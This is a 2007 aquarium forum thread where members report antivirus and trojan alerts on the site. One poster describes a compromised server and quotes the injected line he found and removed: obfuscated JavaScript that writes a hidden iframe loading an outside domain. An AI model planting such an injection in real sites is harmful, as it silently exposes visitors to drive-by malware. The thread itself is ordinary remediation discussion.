Go Back   Aquarium Advice - Aquarium Forum Community > Community Forum > Forum Admin & Announcements
Click Here to Login

Join Aquarium Advice Today
Reply
 
Thread Tools Search this Thread Display Modes
Please support our sponsors and let them know you heard about them on AquariumAdvice.com
 
Old 06-19-2007, 07:34 PM   #31
Aquarium Advice Addict
 
SparKy697's Avatar
 
Join Date: Nov 2006
Location: Northwest Indiana
Posts: 1,495
In addition to the Trojan you are all speaking of I also get a number of virus detections in my McAfee console:

VBS/Psyme
Exploit-CVE2006-3730
JS/Exploit-BO.gen
Exploit-MSDDS

It seems to be only the aa site that gives me these issues.

I can't believe that using FF is the only fix for this.
__________________

__________________
-Joe
"...but the guy at the LFS said I needed it!"
SparKy697 is offline   Reply With Quote
Old 06-19-2007, 07:42 PM   #32
Aquarium Advice Addict
 
Join Date: May 2004
Location: Poughkeepsie, NY
Posts: 3,294
Using FF I get nothing on Office computer using IE I get the trogan message.. can not use FF at work..
__________________

__________________
9/02-125 REEF, 125 lbs LR,LS 4x160 VHO, Reef Devil /Sump, Fuge
7/03-55 FOWLR 60lb LR, 50 lb SD sand 2x40 NO strip light, Reef Devil/sump, Fuge

TANK PICS http://www.aquariumadvice.com/viewtopic.php?t=98202
seaham358 is offline   Reply With Quote
Old 06-19-2007, 08:09 PM   #33
Aquarium Advice Addict
 
Fishyfanatic's Avatar
 
Join Date: Dec 2004
Location: Illinois
Posts: 11,964
I can't use FF on my home computer. I've tried uninstalling, reinstalling, messing with the settings, updating, everything. It won't let me go to any site that is secure. It flat out refuses to open the pages and throws up error messages. IE is so much easier and I prefer the design.
__________________
Vote for Aquarium Advice

29 Gallon Lake Malawi Fry
55 Gallon Community
150 Gallon Lake Malawi Cichlid
Fishyfanatic is offline   Reply With Quote
Old 06-19-2007, 10:39 PM   #34
Aquarium Advice Activist
 
Join Date: Mar 2006
Posts: 153
Quote:
Originally Posted by SparKy697
In addition to the Trojan you are all speaking of I also get a number of virus detections in my McAfee console:

VBS/Psyme
Exploit-CVE2006-3730
JS/Exploit-BO.gen
Exploit-MSDDS

It seems to be only the aa site that gives me these issues.

I can't believe that using FF is the only fix for this.
I got all those right when I logged on ....

BUt ive been getting trojaxs , virus, etc... for a few months now coming onto this website and its ONLY this website .. Is the owner of this site ever gonna look into it ??
__________________
20 gal tank , 5 porkchop rasboro , 2 guppies , 1 blueram , 1 black molly , 1 red/black variatus , 2 cory catfish , 1 bristlenose pleco , 3 java ferns , 1 anarachis , 1 red ludwiga
ikon is offline   Reply With Quote
Old 06-19-2007, 10:43 PM   #35
AA Team Emeritus
 
Join Date: May 2002
Location: Virginia
Posts: 2,256
Send a message via ICQ to fishfreek Send a message via AIM to fishfreek Send a message via MSN to fishfreek Send a message via Yahoo to fishfreek
Quote:
Is the owner of this site ever gonna look into it ??
Not constantly posting does not mean one is not looking into this. I have been looking into this for a while and trying random code removals to correct it. This site is heavily modded and removing the wrong thing will take the site down 100%. I have never seen this message myself and I run Mcafee at work and AVG at home. Both reported as giving the error.
__________________
Remember dont tap the glass, your fish will think you're an idiot -Anonymous mother

Check out our articles area. 30+ Aquatic articles for your enjoyment
Are you in or around the Shenandoah Valley area? If so click here to join our regional forum.
fishfreek is offline   Reply With Quote
Old 06-19-2007, 10:45 PM   #36
Aquarium Advice Activist
 
Join Date: Mar 2006
Posts: 153
Quote:
Originally Posted by fishfreek
Quote:
Is the owner of this site ever gonna look into it ??
Not constantly posting does not mean one is not looking into this. I have been looking into this for a while and trying random code removals to correct it. This site is heavily modded and removing the wrong thing will take the site down 100%. I have never seen this message myself and I run Mcafee at work and AVG at home. Both reported as giving the error.
thats weird that u never see the virus/trojan alerts .. do u use your account ??? try making a new account and see if it makes a difference ..

im using mcaffee..
__________________
20 gal tank , 5 porkchop rasboro , 2 guppies , 1 blueram , 1 black molly , 1 red/black variatus , 2 cory catfish , 1 bristlenose pleco , 3 java ferns , 1 anarachis , 1 red ludwiga
ikon is offline   Reply With Quote
Old 06-19-2007, 10:46 PM   #37
Aquarium Advice Addict
 
Fishyfanatic's Avatar
 
Join Date: Dec 2004
Location: Illinois
Posts: 11,964
It appears that it's an IE thing. FF, you use FF correct?
__________________
Vote for Aquarium Advice

29 Gallon Lake Malawi Fry
55 Gallon Community
150 Gallon Lake Malawi Cichlid
Fishyfanatic is offline   Reply With Quote
Old 06-19-2007, 10:48 PM   #38
AA Team Emeritus
 
Join Date: May 2002
Location: Virginia
Posts: 2,256
Send a message via ICQ to fishfreek Send a message via AIM to fishfreek Send a message via MSN to fishfreek Send a message via Yahoo to fishfreek
I use both regularly. Almost interchangeable but I use IE at work 90% of the time
__________________
Remember dont tap the glass, your fish will think you're an idiot -Anonymous mother

Check out our articles area. 30+ Aquatic articles for your enjoyment
Are you in or around the Shenandoah Valley area? If so click here to join our regional forum.
fishfreek is offline   Reply With Quote
Old 06-20-2007, 12:54 AM   #39
Aquarium Advice Newbie
 
Join Date: Jun 2007
Posts: 3
To follow up on my previous post, I found here (http://forums.pcbsd.org/viewtopic.php?t=8683) that it's a problem with the server being infected with the trojan PHP/Rst.e [PHP/Rst.e].

I'm currently attempting to clean my own server using ClamAV...
__________________
ddcarnage is offline   Reply With Quote
Old 06-20-2007, 03:54 PM   #40
Aquarium Advice Newbie
 
Join Date: Jun 2007
Posts: 3
Ok I'm not sure if this is going to help you guys but I've solved my problem. I had been hacked because of a vulnerability in a third party php script I was using some time ago.

I seems that when my system was comprimised, the hackers modified a very important php file in my message board system to print the following :

Code:
document.write("<ifr"+"ame src=http://goo"+"gler"+"ank.info/cou"+"nter width=1 height=1 style=displ"+"ay:none></ifra"+"me>");
Removing that solved the virus problem.

Cheers and good luck.
__________________

__________________
ddcarnage is offline   Reply With Quote
Reply

Please support our sponsors and let them know you heard about them on AquariumAdvice.com

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are Off
Pingbacks are Off
Refbacks are Off


Similar Threads
Thread Thread Starter Forum Replies Last Post
Main Page Format Change? Purrbox Forum Admin & Announcements 3 03-10-2007 10:44 PM
!!!!Update to the Main Page!!! fishfreek Forum Admin & Announcements 0 11-08-2002 10:41 PM







» Photo Contest Winners








Copyright 2002- Social Knowledge, LLC All Rights Reserved.

All times are GMT -4. The time now is 02:36 AM.


Powered by vBulletin® Version 3.8.8 Beta 1
Copyright ©2000 - 2017, vBulletin Solutions, Inc.